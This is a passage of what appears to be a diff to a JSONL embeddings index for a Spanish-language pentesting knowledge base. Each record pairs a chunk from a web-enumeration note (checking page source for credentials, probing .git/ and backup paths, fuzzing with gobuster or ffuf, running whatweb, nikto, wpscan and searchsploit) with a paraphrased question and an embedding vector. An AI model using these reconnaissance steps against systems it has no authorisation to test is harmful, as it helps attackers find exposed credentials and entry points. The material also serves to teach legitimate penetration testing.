-0.03797, -0.04575, 0.00916, -0.014, 0.02209, -0.04995]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n web\n\n> Puertos 80/443/8080. El vector web es el foothold mΓ‘s comΓΊn en standalones. Parte de EnumeraciΓ³n.\n> Para la **metodologΓ­a de ataque** (quΓ© probar en cada input) ve a Hacking web; aquΓ­ solo enumeras.", "indexar": "que herramienta me sirve para revisar los puertos y datos bΓ‘sicos de una pΓ‘gina?", "v": [-0.01231, 0.0652, -0.15481, -0.26898, 0.0823, -0.18676, 0.05533, -0.1396, -0.05471, -0.10878, -0.05866, -0.09034, 0.02827, -0.09567, 0.06551, -0.03503, 0.06619, -0.06005, 0.03765, -0.05269, 0.00153, -0.06378, -0.10271, -0.02563, -0.15011, 0.01996, 0.09084, -0.02201, -0.19555, 0.10004, -0.01926, -0.02081, 0.02476, -0.00923, -0.10403, -0.03725, 0.07172, 0.07465, 0.02699, 0.01721, 0.06084, 0.0543, -0.03746, 0.07377, 0.08449, -0.02209, -0.06429, 0.06204, 0.04619, 0.04388, 0.00604, -0.03228, -0.13274, 0.02282, -0.14402, -0.07853, 0.16756, -0.06475, 0.06681, -0.11973, -0.10992, 0.03595, 0.0025, -0.08544, -0.04976, -0.04333, -0.01411, -0.00895, -0.02542, 0.11006, -0.07513, 0.06271, 0.03568, -0.06879, -0.04041, -0.17053, 0.13631, 0.08877, 0.01219, 0.054, -0.0216, -0.00265, -0.10343, -0.01617, -0.05835, -0.04198, -0.06171, 0.01049, 0.04207, -0.10967, 0.06048, 0.0367, -0.0485, 0.0032, -0.07605, 0.09522, -0.00726, -0.04295, -0.01842, -0.05243, 0.0987, -0.02514, -0.00777, 0.03209, 0.02943, 0.01077, -0.00778, -0.02436, -0.06485, 0.03534, 0.09782, 0.04271, 0.01518, -0.07156, 0.00998, 0.03407, -0.02797, -0.08699, -0.00266, -0.02223, 0.09006, -0.07775, -0.04935, -0.06012, -0.021, 0.02989, 0.00461, 0.08416, 0.0568, 0.02569, 0.04015, -0.06447, -0.08446, 0.02651, 0.0485, -0.04172, 0.00069, -0.16592, -0.00698, -0.05276, -0.03146, 0.09788, -0.10679, -0.01231, 0.04515, -0.0254, 0.07698, 0.05676, -0.0915, -0.00409, 0.00643, -0.01167, -0.00753, 0.0744, -0.09401, -0.00757, 0.08019, -0.01517, -0.09641, -0.03031, -0.02815, -0.03819, 0.02003, 0.00648, 0.01081, -0.08638, 0.00348, 0.05374, 0.08472, 0.03896, 0.02493, 0.04693, 0.00782, -0.10242, 0.01012, -0.00396, -0.09445, -0.03988, -0.08456, -0.01437, 0.01731, -0.03258, -0.03807, -0.03514, -0.03542, -0.0806, 0.01392, -0.10299, -0.00406, 0.01864, 0.02284, 0.07357, -0.01297, -0.03171, 0.04613, 0.02792, -0.05815, 0.04184, 0.05049, -0.04037, 0.03328, 0.00298, -0.00543, -0.0163, 0.02645, 0.06328, -0.0269, -0.06482, 0.018, 0.00621, -0.02303, -0.03142, 0.00782, -0.01042, -0.01288, -0.02787, 0.03679, 0.04496, 0.019, 0.02616, -0.03002, 0.05213, -0.02686, 0.02472, -0.00536, 0.02755, 0.04233, -0.02171, -0.00527, -0.0228, 0.03212, -0.04266, -0.03104, -0.00875, 0.01394, -0.07313, -0.042, 0.02642, -0.03323, -0.02764, 0.00879, -0.00189, -0.02203, -0.05046, 0.04058, -0.02916, 0.00701, -0.03539, -0.02183, -0.03654, -0.04875, -0.04771, 0.04341, -0.03931, -0.00741, -0.03938]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "quΓ© herramientas me ayudan a encontrar credenciales ocultas en el cΓ³digo?", "v": [0.12246, 0.07738, -0.11015, -0.02327, 0.00395, -0.129, -0.04233, 0.09486, -0.06056, -0.12705, -0.1842, -0.0793, -0.03842, -0.1108, 0.10283, -0.03173, 0.11387, -0.05875, 0.03212, 0.01277, -0.02552, -0.06914, -0.13669, -0.05523, -0.04696, -0.06326, 0.04796, 0.04209, -0.12293, 0.01991, 0.06172, 0.03878, -0.0267, 0.08056, -0.12937, 0.08532, -0.06383, 0.03916, -0.04293, 0.08901, -0.0426, 0.00764, 0.02412, 0.02027, 0.05888, -0.01992, -0.08468, 0.16217, -0.04174, 0.02103, -0.19052, -0.22712, -0.12583, -0.11354, 0.05991, -0.17652, 0.11832, -0.00509, -0.02538, -0.06811, -0.06722, -0.04474, 0.01863, 0.02602, -0.00554, 0.01341, 0.0383, -0.07982, -0.10444, 0.08343, -0.03378, 0.03202, -0.01527, 0.00219, 0.01413, -0.00424, 0.01537, -0.05331, 0.04578, 0.02735, 0.06353, 0.03361, 0.00478, 0.02582, 0.0171, -0.01736, -0.055, 0.02822, -0.09561, -0.15195, 0.0878, 0.07618, -0.04565, 0.0449, 0.03213, 0.09396, 0.00413, 0.01622, 0.03223, 0.0308, 0.0469, -0.16552, -0.02479, 0.06044, 0.04446, 0.09933, 0.02444, 0.00026, -0.05437, 0.02238, 0.02988, -0.00801, -0.06047, -0.02332, 0.01336, 0.03125, 0.01342, -0.05565, -0.00835, -0.11678, -0.01874, 0.03315, -0.06979, 0.07873, -0.00616, 0.02612, -0.02389, 0.06037, 0.04176, -0.1487, -0.12395, -0.10212, -0.053, 0.03758, 0.05263, 0.02179, 0.03753, -0.06835, -0.05349, 0.07787, 0.05095, -0.04006, 0.00773, -0.0302, 0.02906, 0.0091, 0.03489, -0.07307, 0.00565, -0.05382, 0.01711, 0.10361, 0.05603, 0.0183, -0.02516, 0.04362, 0.03596, -0.03424, -0.05496, 0.00259, -0.04856, -0.00374, -0.02765, -0.05405, -0.04117, -0.06167, 0.01258, 0.03014, -0.01557, 0.01067, 0.05348, 0.01662, 0.08342, -0.06855, 0.01455, -0.04289, 0.04235, -0.07018, -0.05735, -0.05678, 0.03425, 0.08686, 0.06805, -0.03338, 0.04014, -0.01382, 0.05123, -0.03485, -0.01579, 0.01411, 0.01792, -0.01813, 0.02635, -0.00528, -0.07284, 0.02034, 0.03942, -0.02818, 0.01642, -0.11638, -0.04984, 0.03798, -0.01481, -0.10306, 0.02233, 0.06073, -0.06134, -0.00974, -0.04209, 0.04454, 0.064, -0.04334, 0.08511, -0.08898, -0.0471, 0.01979, -0.05421, 0.0425, -0.00301, -0.05877, 0.03417, -0.03619, 0.04557, -0.02813, 0.03629, -0.01495, -0.0079, 0.1013, 0.00842, 0.03369, 0.00807, -0.02949, -0.06659, 0.02095, 0.03509, -0.0282, -0.00135, -0.0037, -0.03457, -0.02348, -0.01624, 0.02014, 0.01307, -0.06951, -0.02832, -0.01894, -0.03008, -0.02104, -0.03744, -0.01092, -0.04959, 0.00494, 0.04276, -0.08364, 0.06696, -0.06425]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "cΓ³mo descubro rutas y archivos confidenciales que no aparecen en la web?", "v": [0.09025, -0.0174, 0.02382, -0.05538, 0.0782, -0.13834, 0.02794, -0.04713, -0.0666, -0.06796, -0.0036, -0.14381, 0.08093, 0.0604, 0.07024, -0.07298, 0.02204, 0.0653, 0.0987, -0.05247, -0.06812, -0.06926, -0.01339, 0.08563, -0.11938, -0.17491, 0.07327, 0.08733, -0.05932, 0.04297, 0.00803, -0.00201, 0.00122, 0.0878, -0.0494, 0.11254, 0.09814, 0.08029, -0.18334, 0.00935, 0.02367, -0.03341, -0.10207, 0.05828, 0.00109, -0.06867, -0.11122, -0.09578, 0.01408, 0.05418, -0.0513, -0.07183, -0.09877, -0.02262, -0.05304, 0.00411, 0.06501, -0.04811, 0.09705, 0.06582, -0.02245, 0.10807, 0.06611, 0.11886, -0.06055, -0.07309, 0.00544, 0.01209, -0.08616, 0.01924, 0.12234, 0.0415, 0.03317, 0.02702, 0.03207, -0.03338, -0.05323, 0.07454, 0.0472, 0.10088, 0.11602, 0.04662, 0.0122, 0.07559, -0.11253, 0.00375, 0.02035, 0.05061, -0.02763, -0.11062, 0.07959, 0.09721, -0.13696, 0.01122, -0.01175, 0.00171, 0.10924, 0.00159, -0.04826, -0.03565, -0.07535, 0.10399, -0.10115, 0.04165, 0.02366, 0.1782, -0.07159, 0.02684, -0.00098, -0.01644, 0.03217, -0.01815, 0.01053, 0.03063, 0.00274, 0.0604, 0.01439, -0.03453, 0.00277, -0.0988, -0.05343, -0.03754, -0.07385, 0.00054, -0.05013, 0.09382, -0.10622, 0.07263, -0.10008, -0.03921, -0.03297, -0.07449, -0.09998, 0.02442, 0.03032, 0.00893, -0.04453, 0.03655, -0.03548, -0.10995, 0.11269, -0.04004, -0.06954, 0.03063, 0.11609, 0.04923, -0.02935, -0.05368, -0.09376, -0.02644, -0.09376, 0.02455, -0.04461, 0.08464, 0.02889, 0.04648, -0.06066, -0.15112, -0.02016, 0.05283, -0.00921, 0.07434, -0.07514, 0.03182, 0.03024, 0.03363, -0.03067, 0.0093, -0.0023, -0.09372, 0.03066, 0.02786, -0.02454, -0.05557, 0.04076, 0.0274, -0.02748, -0.02425, 0.09594, -0.03018, -0.00278, 3e-05, 0.05044, 0.05949, -0.01888, -0.02038, 0.06749, -0.06983, -0.02253, 0.01488, -0.04989, 0.02485, -0.06385, 0.08704, 0.00764, 0.00253, -0.07338, 0.05496, -0.01462, -0.00334, 0.02487, -0.00633, -0.01398, 0.01989, -0.00014, 0.01886, -0.02675, -0.0748, -0.01081, 0.00526, 0.05803, -0.03034, 0.032, -0.09156, -0.04526, 9e-05, 0.00978, -0.05069, -0.04102, 0.02356, 0.05393, 0.04103, 0.09912, -0.05777, 0.0473, 0.039, 0.03376, 0.01298, 0.00295, -0.02653, -0.02616, 0.05696, -0.08813, -0.03204, 0.06945, -0.02638, -0.0116, -0.06247, -0.0345, -0.03768, -0.00359, 0.06672, 0.0298, 0.0293, -0.01014, -0.10925, -0.07012, -0.01352, 0.03064, -0.02618, -0.02552, 0.02201, 0.00713, 0.03995, 0.03883, -0.06932]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Primero, lo manual\n```\nCtrl+U siempre β†’ comentarios con creds, paths, endpoints\nJS embebidos β†’ APIs ocultas (LinkFinder, JSparser)\nrobots.txt β†’ perezoso; mira tambiΓ©n:\n sitemap.xml, .git/, .svn/, .htaccess, .DS_Store,\n backup/, old/, dev/, test/, admin/\n```", "indexar": "con quΓ© puedo buscar directorios de desarrollo o copias de seguridad no indexadas?", "v": [0.07733, 0.04841, -0.04561, -0.08677, 0.02201, -0.15124, 0.0058, 0.00436, -0.12579, -0.03569, -0.03357, -0.12714, -0.11408, -0.1829, 0.04356, -0.10651, 0.16074, -0.01592, -0.0203, -0.04982, 0.0786, -0.06317, -0.02028, -0.00506, -0.03654, -0.02037, -0.08584, -0.0723, -0.08985, 0.01113, 0.00928, 0.01827, 0.04392, 0.02199, -0.19168, -0.00613, 0.03346, -0.03507, -0.06804, 0.01433, -0.04503, 0.01194, -0.13925, -0.01409, 0.05829, -0.1564, 0.03551, -0.0532, 0.04364, -0.10846, -0.01381, -0.10046, -0.07122, -0.10245, 0.03426, -0.00486, 0.13605, -0.0466, 0.118, 0.00612, -0.1822, 0.04725, 0.06486, 0.00468, 0.00752, -0.08801, 0.01312, -0.07541, -0.12918, -0.01442, -0.08043, 0.1464, 0.05662, 0.05817, 0.02876, -0.02727, -0.06533, -0.01746, -0.09818, 0.15007, -0.04158, -0.05136, -0.02179, 0.00439, -0.11166, -0.13047, -0.03681, 0.03935, -0.04901, -0.03293, 0.07274, 0.01012, -0.04238, 0.03957, -0.02013, -0.07537, -0.00891, 0.03025, -0.04674, 0.07946, -0.06627, -0.06891, -0.01751, 0.08142, 0.01696, 0.06343, 0.03737, 0.08161, -0.03754, -0.05947, -0.00025, 0.05544, 0.00599, -0.04401, -0.06653, -0.00046, -0.03913, 0.00484, 0.06977, 0.04313, 0.00614, -0.04384, -0.06033, 0.01458, 0.03261, -0.03886, 0.02757, 0.11121, -0.0151, -0.06185, 0.01741, -0.05865, -0.09748, -0.0131, 0.00361, 0.09325, -0.04096, -0.05263, 0.07419, -0.0641, 0.00017, 0.03415, 0.032, -0.0239, -0.05905, 0.07752, 0.00023, -0.00262, -0.05283, -0.07945, -0.01829, -0.04152, 0.07957, 0.03972, 0.00475, 0.05975, 0.03035, -0.13669, 0.07811, 0.04829, 0.09118, 0.08903, -0.02708, -0.0052, 0.03421, -0.00146, 0.0355, -0.01323, 0.04973, -0.0382, -0.06774, 0.00133, 0.03762, -0.16221, 0.02189, -0.06187, -0.04163, -0.05324, 0.00631, -0.05308, -0.00232, 0.01114, -0.05165, 0.01337, 0.01837, -0.08308, 0.01052, 0.04639, 0.0225, 0.02704, 0.06073, 0.00293, -0.06977, 0.00608, -0.02179, -0.06147, 0.01977, -0.00789, -0.05929, -0.03143, -0.06349, 0.01056, -0.06723, -0.03481, 0.08742, -0.0361, -0.02082, 0.06494, -0.00293, -0.02267, 0.02128, 0.02602, 0.05073, -0.01351, -0.10071, -0.01579, -0.00193, 0.0434, -0.02054, -0.01322, -0.01686, 0.05702, 0.08275, 0.01215, 0.0268, -0.05548, 0.02613, -0.00524, 0.03911, 0.045, 0.00895, 0.0831, -0.05172, -0.03639, 0.07137, 0.01087, -0.00575, -0.00477, -0.04036, -0.03353, -0.01691, 0.11563, -0.05769, -0.00682, -0.10523, -0.02991, -0.09354, 0.01046, 0.04754, -0.12074, 0.00971, 0.02152, 0.03049, -0.08439, 0.00532, -0.04255]} +{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf β†’ nota dedicada: Content discovery.\n- Hostnames/vhosts β†’ Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "indexar": "que programa sirva para descubrir rutas y archivos ocultos en un servidor", "v": [0.20746, -0.1639, -0.18074, -0.17379, 0.01351, -0.13061, 0.02552, -0.08003, 0.11587, -0.06973, -0.04753, -0.15238, 0.1274, -0.02426, 0.02224, 0.00663, 0.1569, -0.01434, 0.10131, 0.05335, -0.00675, 0.03576, 0.07827, -0.00452, -0.06808, -0.05648, 0.10343, 0.03361, 0.04813, -0.06025, -0.02202, 0.06757, 0.07538, -0.04462, -0.00277, 0.0013, 0.03458, 0.0193, -0.04987, -0.02663, 0.08403, 0.024, -0.01778, 0.09672, 0.02645, -0.03905, 0.00839, -0.07335, 0.05089, -0.03747, -0.0705, -0.10146, -0.10676, -0.0095, 0.05832, -0.04384, -0.10598, -0.15889, 0.02444, 0.02076, -0.04595, 0.07066, -0.02151, -0.05064, 0.06556, -0.02622, 0.01018, 0.02448, -0.10212, 0.00035, -0.0069, 0.05451, 0.11284, -0.00923, -0.01275, 0.00379, 0.00726, -0.06445, 0.0325, 0.04605, 0.04621, 0.07255, 0.01314, 0.1284, -0.0995, -0.0674, 0.03571, 0.03609, -0.03522, -0.00551, 0.01376, 0.09036, -0.08891, 0.1319, 0.02427, -0.01564, 0.22056, -0.02975, 0.00844, 0.04059, 0.01453, 0.00668, -0.08044, 0.13907, -0.04414, 0.17224, 0.05542, -0.04586, -0.00282, 0.05352, 0.10186, 0.00822, -0.00013, 0.01819, -0.0751, -0.00536, 0.07731, 0.00126, 0.03577, -0.03497, -0.11708, 0.03248, -0.07587, 0.08313, 0.08953, -0.07913, -0.01352, 0.09209, -0.01993, 0.0151, 0.02528, 0.00722, -0.08387, -7e-05, -0.12146, -0.03034, 0.09068, 0.04578, -0.06519, -0.06659, 0.0703, -0.02539, -0.04951, 0.05731, 0.11801, 0.02182, 0.04254, -0.07428, -0.00937, 0.00202, -0.04662, -0.0174, 0.00272, 0.01289, -0.02869, 0.00944, 0.03609, -0.112, -0.09845, 0.04683, -0.00166, 0.06912, -0.06763, -0.0213, 0.06008, -0.09139, 0.02192, 0.01666, 0.07689, -0.01497, -0.01249, 0.03133, 0.02644, -0.06566, -0.03622, 0.00971, -0.04625, -0.10588, 0.0836, 0.0382, -0.05348, 0.0371, 0.04915, 0.03143, -0.06789, -0.05866, 0.06201, -0.04969, -0.04535, -0.00252, 0.03608, -0.03257, -0.05835, 0.05297, -0.02932, -0.06393, 0.01075, 0.03471, 0.02008, -0.04392, -0.00566, -0.01554, -0.02671, -0.01316, -0.01853, -0.0145, -0.04501, 0.00973, 0.05285, 0.06143, 0.01093, -0.06053, 0.08942, -0.06518, 0.02496, -0.01293, -0.02669, -0.00349, 0.02123, 0.00384, -0.00067, 0.01268, 0.02405, 0.02444, 0.04316, -0.02145, -0.01007, 0.01324, 0.03209, -0.03051, -0.03927, -0.04091, -0.07001, 0.03018, 0.02051, -0.00875, 0.00307, -0.02747, -0.03941, -0.05758, -0.0093, 0.08545, 0.0493, -0.0576, -0.01907, -0.04184, 0.0035, -0.00337, -0.00917, 0.01082, -0.01519, 0.01571, 0.03837, -0.01357, 0.05533, -0.03362]} {"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf β†’ nota dedicada: Content discovery.\n- Hostnames/vhosts β†’ Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "indexar": "con quΓ© puedo interceptar y modificar el trΓ‘fico de una aplicaciΓ³n web", "v": [-0.00067, 0.1801, -0.10393, -0.2278, 0.11825, 0.01118, -0.02945, 0.12588, -0.03031, 0.0396, -0.01408, -0.14134, 0.01163, -0.01025, 0.07626, 0.05929, 0.01837, -0.06864, 0.07876, -0.06524, 0.04433, -0.02017, -0.04147, -0.08877, -0.06589, -0.00618, -0.14245, -0.02735, -0.12427, -0.09046, -0.11899, -0.01677, 0.1307, 0.10323, -0.08934, -0.05058, 0.00726, 0.02612, 0.04278, -0.04823, 0.07939, -0.0806, -0.15247, -0.0288, 0.03037, 0.00823, -0.09169, -0.02147, -0.12486, -0.08829, 0.06259, -0.0569, -0.13241, -0.06862, -0.09573, 0.03799, 0.13957, -0.13231, 0.05948, 0.00972, -0.01292, 0.08125, -0.07547, 0.03653, 0.03194, -0.09973, -0.03823, 0.12354, -0.09123, 0.02101, 0.07831, 0.09977, 0.00532, 0.14264, 0.15498, 0.01136, -0.05159, 0.02937, 0.05886, -0.0019, -0.00625, 0.01273, -0.12327, 0.08893, -0.00442, 0.02918, 0.01691, -0.13774, 0.01026, -0.02737, 0.05334, 0.09737, 0.01965, -0.05294, 0.03293, -0.02913, -0.04954, -0.00978, 0.03505, 0.01147, 0.11907, -0.01092, -0.15479, 0.01372, 0.02552, 0.03058, 0.01281, -0.04614, 0.00087, 0.01165, -0.10695, -0.05758, -0.02121, -0.02552, -0.00712, -0.02485, -0.00271, -0.0128, -0.03654, -0.12175, -0.10495, -0.00528, -0.02573, -0.06447, 0.02995, 0.0205, -0.01454, 0.16336, 0.0387, -0.02185, -0.02834, -0.06118, -0.08989, -0.04688, -0.00614, -0.00867, -0.05336, -0.05688, 0.03008, 0.0528, 0.02214, -0.07018, 0.03447, 0.06263, 0.02034, 0.00012, -0.02156, -0.0393, -0.09436, -0.06099, 0.03025, -0.11995, -0.07722, -0.02276, -0.01119, 0.08639, -0.00618, -0.10392, -0.01053, -0.01856, -0.06124, 0.05474, -0.05575, 0.00598, 0.03244, -0.04577, -0.04339, 0.01589, 0.04561, -0.01563, -0.01641, 0.00415, 0.02004, -0.09624, 0.01931, -0.0377, -0.08704, 0.01491, 0.05575, -0.09317, -0.04107, 0.00497, 0.02001, 0.05536, 0.0157, -0.02818, -0.0264, 0.0622, -0.03951, 0.01996, -0.00323, 0.09921, 0.01379, -0.01932, -0.00244, -0.00398, 0.02409, 0.00363, 0.05072, -0.01495, -0.00307, -0.10712, 0.03472, -0.06168, -0.01142, -0.05002, -0.01504, -0.00828, 0.0201, 0.07354, -0.02062, 0.00871, 0.04797, -0.02443, 0.00194, -0.04955, 0.0131, 0.03186, 0.01242, 0.0135, 0.00826, 0.01425, 0.00286, -0.0077, -0.03304, 0.04383, 0.00111, 0.01285, 0.0517, 0.05616, -0.03552, -0.02873, -0.03639, -0.01314, 0.04161, 0.01731, -0.04501, -0.02466, -0.07723, -0.05862, 0.01414, 0.02647, 0.00157, -0.03834, -0.02535, -0.06528, -0.05652, -0.0015, 0.02038, -0.05136, -0.0594, 0.04828, 0.06138, -0.02521, 0.04538, -0.01639]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzing de contenido\nBrute force de rutas/ficheros con gobuster/feroxbuster/ffuf β†’ nota dedicada: Content discovery.\n- Hostnames/vhosts β†’ Vhosts y subdominios.\n- Intercepta y manipula todo con Burp Suite.", "indexar": "cuΓ‘l es la herramienta para realizar un descubrimiento de contenido mediante fuerza bruta", "v": [0.14775, 0.02545, -0.18545, -0.02905, 0.08394, 0.02302, 0.01215, -0.0358, -0.06042, -0.20563, -0.09317, 0.04516, -0.05329, 0.13478, 0.03461, -0.00618, 0.04697, -0.16514, -0.14274, -0.06882, 0.00013, -0.14604, -0.01199, -0.09987, -0.1067, -0.07614, -0.01592, 0.08959, -0.0969, 0.02335, 0.06799, 0.15857, 0.09456, -0.03539, -0.0713, -0.03779, -0.03026, -0.0022, 0.00463, 0.02547, -0.09816, 0.01521, -0.05074, 0.0839, -0.10549, 0.01808, -0.03446, 0.04197, -0.08371, 0.04229, -0.05131, -0.04427, -0.13587, -0.05993, -0.04606, -0.18878, 0.10991, -0.05174, -0.02695, -0.03205, -0.07686, 0.00035, -0.06802, -0.07137, -0.03569, -0.09833, -0.03617, 0.00197, -0.00554, 0.01804, -0.06189, -0.08789, -0.00413, -0.00089, -0.05994, 0.0404, -0.02517, 0.07749, 0.00039, -0.03469, 0.02132, 0.03771, -0.11678, -0.01454, -0.07833, -0.10801, 0.1299, -0.09944, -0.04108, -0.13789, -0.01034, 0.02884, -0.05646, 0.10096, -0.03156, 0.0006, 0.03454, -0.03171, -0.04345, 0.01341, 0.09952, -0.08479, -0.0518, -0.00739, 0.08587, 0.02891, -0.057, -0.0026, -0.07463, -0.00043, 0.06495, -0.04087, -0.05246, -0.00312, -0.08846, 0.11733, -0.05057, -0.11619, -0.0426, -0.11871, -0.04656, 0.01746, -0.0462, 0.03306, -0.03802, -0.0099, -0.00507, 0.06978, 0.07296, -0.14744, 0.04558, -0.01475, -0.01054, 0.0102, -0.00125, -0.04492, 0.01446, -0.12764, -0.0186, -0.0725, 0.08925, -0.05169, 0.00206, -0.10954, 0.11715, 0.017, 0.04263, 0.01712, -0.08112, 0.03236, -0.01595, -0.05499, -0.01252, 0.03726, -0.02954, 0.01154, 0.02851, -0.01262, -0.10541, 0.0117, -0.0655, -0.04974, -0.09469, -0.06054, 0.00412, -0.05093, -0.07393, -0.04574, 0.02644, -0.02691, 0.0129, -0.01552, 0.06363, -0.01872, 0.00531, -0.07978, -0.04894, 0.01627, -0.00805, -0.05015, -0.02352, 0.04704, -0.0326, -0.02831, -0.0674, -0.04262, 0.06105, -0.0801, -0.02682, 0.02042, 0.02741, 0.03357, -0.01793, 0.02379, -0.04014, -0.06605, -0.0483, -0.03307, 0.04627, 0.03244, -0.00328, -0.01984, -0.02192, -0.05337, 0.02547, 0.01143, -0.03208, -0.02267, -0.02691, -0.01722, 0.06682, -0.05068, 0.07844, -0.0455, -0.04787, -0.01993, -0.03214, 0.00148, -0.02284, 0.0318, 0.02691, 0.03118, 0.07341, -0.01716, -0.03027, -0.00106, 0.04872, 0.02428, 0.02299, -0.00639, 0.00428, -0.0183, -0.00983, -0.02846, 0.01692, 0.01863, 0.03929, -0.00405, -0.07949, -0.04151, -0.00033, 0.07486, 0.01935, -0.04174, -0.04448, -0.02101, -0.00054, 0.0052, -0.03813, -0.06076, -0.02552, 0.04566, 0.11536, -0.06791, 0.03101, -0.07477]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "que herramienta sirve para detectar quΓ© CMS tiene una web?", "v": [-0.0542, 0.0683, -0.08222, -0.16743, -0.01143, -0.21817, -0.16467, 0.07469, -0.02833, -0.07393, -0.08517, 0.0134, -0.08116, -0.13122, 0.1541, 0.05972, 0.1554, -0.141, 0.06306, -0.04052, 0.01708, -0.15206, -0.0784, -0.02327, -0.14118, -0.0139, -0.00587, -0.1253, -0.17041, 0.03845, 0.03687, -0.02897, 0.0038, 0.07163, -0.09093, -0.03744, -0.12258, 0.01667, -0.04201, 0.0883, 0.05312, 0.03903, -0.03291, 0.03839, 0.01817, -0.04465, -0.0132, -0.09525, 0.03829, 0.0531, -0.10343, -0.04507, -0.20281, -0.01148, -0.02932, -0.04995, 0.11692, -0.07452, 0.06732, -0.13195, -0.12711, 0.03794, -0.10052, -0.0425, -0.09462, -0.051, -0.05386, -0.00903, -0.04745, 0.02629, 0.02559, -0.0486, 0.10042, -0.02731, 0.0416, -0.01287, 0.01219, 0.08535, 0.1234, -0.06875, 0.08108, -0.0659, -0.06079, 0.07578, -0.04423, -0.03998, 0.06349, -0.02855, -0.00129, -0.0922, 0.04974, 0.1646, -0.0038, 0.01154, -0.02836, -0.06266, 0.09227, -0.08601, 0.04635, -0.01594, 0.06965, -0.06782, -0.04301, 0.06186, -0.00848, -0.00432, 0.02622, 0.02577, -0.10272, -0.04073, 0.04739, 0.0077, -0.04528, -0.00988, -0.04816, 0.11364, 0.02247, 0.01958, -0.02749, -0.04555, 0.00138, 0.06529, -0.08778, -0.05783, 0.00179, 0.0122, -0.03108, 0.04135, -0.02685, -0.05393, -0.00628, -0.10475, -0.10593, 0.02701, -0.0191, 0.01164, 0.01759, -0.09833, -0.03627, 0.00183, -0.04207, -0.00941, -0.0368, -0.07734, 0.06823, -0.02593, 0.00238, -0.0174, -0.05853, -0.00227, 0.02, -0.037, -0.00618, -0.03175, -0.11875, 0.00462, 0.00163, 0.02812, -0.12252, 0.00721, -0.07986, -0.06755, 0.07038, 0.02011, 0.04094, -0.03456, 0.00191, 0.01817, 0.10118, 0.06988, 0.04901, 0.03517, 0.08931, -0.08094, 0.01129, -0.00764, -0.04205, -0.02002, 0.02629, -0.08214, -0.05278, -0.01047, 0.0119, -0.00657, 0.01901, -0.05123, 0.00605, 0.00611, -0.02909, 0.00856, 0.02739, 0.00331, 0.01789, -0.04257, 0.08441, 0.05685, 0.01631, -0.09311, 0.07213, -0.00504, -0.05766, -0.03893, 0.02547, -0.0201, 0.00109, 0.03924, 0.03069, -0.00294, 0.0152, 0.02598, 0.01738, 0.02239, 0.01628, -0.00816, -0.01576, -0.02059, -0.04685, 0.05658, -0.024, -0.00568, 0.01026, -0.01261, 0.03625, 0.00885, 0.03331, 0.01627, 0.00263, -0.01095, 0.04898, 0.01674, 0.03188, -0.06026, -0.0008, 0.01657, 0.01225, -0.11859, 0.02945, -0.01637, -0.05902, -0.01778, 0.00564, 0.02679, 0.02325, 0.00163, 0.03904, -0.04291, -0.01902, -0.04285, -0.03989, -0.03395, -0.05477, -0.03593, 0.0588, -0.02908, -0.0056, 0.02963]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n web", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n web.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado β†’ `wpscan`, `cmsmap`, `searchsploit `.", "indexar": "con que puedo identificar el sistema de gestiΓ³n de contenidos de un sitio?", "v": [-0.07769, 0.16581, -0.08642, -0.16197, 0.1186, -0.13654, -0.08162, -0.09835, -0.16355, -0.07115, -0.1012, -0.04863, -0.0192, -0.06129, 0.09445, 0.07166, 0.11056, -0.14981, -0.03599, -0.05672, -0.02103, -0.12923, 0.01931, 0.00106, -0.07231, -0.01009, 0.06597, -0.10256, -0.04825, -0.01924, -0.00268, 